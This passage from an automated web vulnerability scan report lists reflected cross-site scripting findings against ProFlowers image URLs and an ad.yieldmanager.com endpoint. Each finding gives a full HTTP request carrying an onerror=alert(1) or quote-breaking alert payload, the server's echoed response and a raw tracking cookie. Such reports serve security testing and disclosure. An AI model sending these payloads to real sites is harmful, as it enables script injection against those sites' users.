Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d was submitted in the REST URL parameter 9. This input was echoed as 9c7cf<img src=a onerror=alert(1)>fc11b4a6f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/TUL15swthrt_gv09_2_FC_PF9c7cf<img src=a onerror=alert(1)>fc11b4a6f5d

1.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50 was submitted in the REST URL parameter 9. This input was echoed as 5b4b5<img src=a onerror=alert(1)>e71fc12cb50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20assrt_dmsk11_PF5b4b5<img src=a onerror=alert(1)>e71fc12cb50

1.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e was submitted in the REST URL parameter 9. This input was echoed as 4323c<img src=a onerror=alert(1)>4e98c60444e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_sgv09_control_FC_PF4323c<img src=a onerror=alert(1)>4e98c60444e

1.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57 was submitted in the REST URL parameter 9. This input was echoed as ee8b1<img src=a onerror=alert(1)>e4f2ea6dc57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PFee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_sgv09_test_PFee8b1<img src=a onerror=alert(1)>e4f2ea6dc57

1.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7 was submitted in the REST URL parameter 9. This input was echoed as b6d74<img src=a onerror=alert(1)>d87e77dd9b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PFb6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PFb6d74<img src=a onerror=alert(1)>d87e77dd9b7

1.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload def66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757 was submitted in the REST URL parameter 9. This input was echoed as def66<img src=a onerror=alert(1)>193b0e5b757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQdef66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:08 GMT
Connection: close

Unable to find /ProvideCommerce/bearwithredbow09_SQdef66<img src=a onerror=alert(1)>193b0e5b757

1.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe was submitted in the REST URL parameter 9. This input was echoed as a9cd3<img src=a onerror=alert(1)>2550109adfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tna9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/holidaychoc07_tna9cd3<img src=a onerror=alert(1)>2550109adfe

1.51. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95cdf"-alert(1)-"14e796c9f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=728x90&section=1333214&95cdf"-alert(1)-"14e796c9f61=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/hubs/hot/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!A!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mP>!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPA!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPD!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPG!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPJ!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#LI8!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#LI9!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#p!r!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL!#p!u!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL"; ih="b!!!!N!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0LZy!!!!#<m,_`!0L[#!!!!$<m8>B"; vuday1=Gf(n`NFd*luBw.^; bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!%<lmXb!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!2a*!!!!#<ln<2!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!,<m915!#Ic1!!!!$<lmXc!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MP0!!!!#<jLPe!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#RSx!!!!#<m*gT!#RY.!!!!'<m8qE!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#X]l!!!!'<m8qE!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]DN!!!!#<m8qE!#]W%!!!!'<m8qE!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^Bo!!!!'<m8qE!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g[h!!!!'<m8qE!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mJR!!!!#<m8qE!#mP5!!!!$<lise!#mP6!!!!$<lise!#naX!!!!'<m8qE!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p#b!!!!'<m8qE!#p9d!!!!#<lj09!#pD8!!!!'<m8>B!#sx#!!!!3<m9Vd"

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:17:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Fri, 11 Feb 2011 18:17:00 GMT
Pragma: no-cache
Content-Length: 4645
Age: 0
Proxy-Connection: close

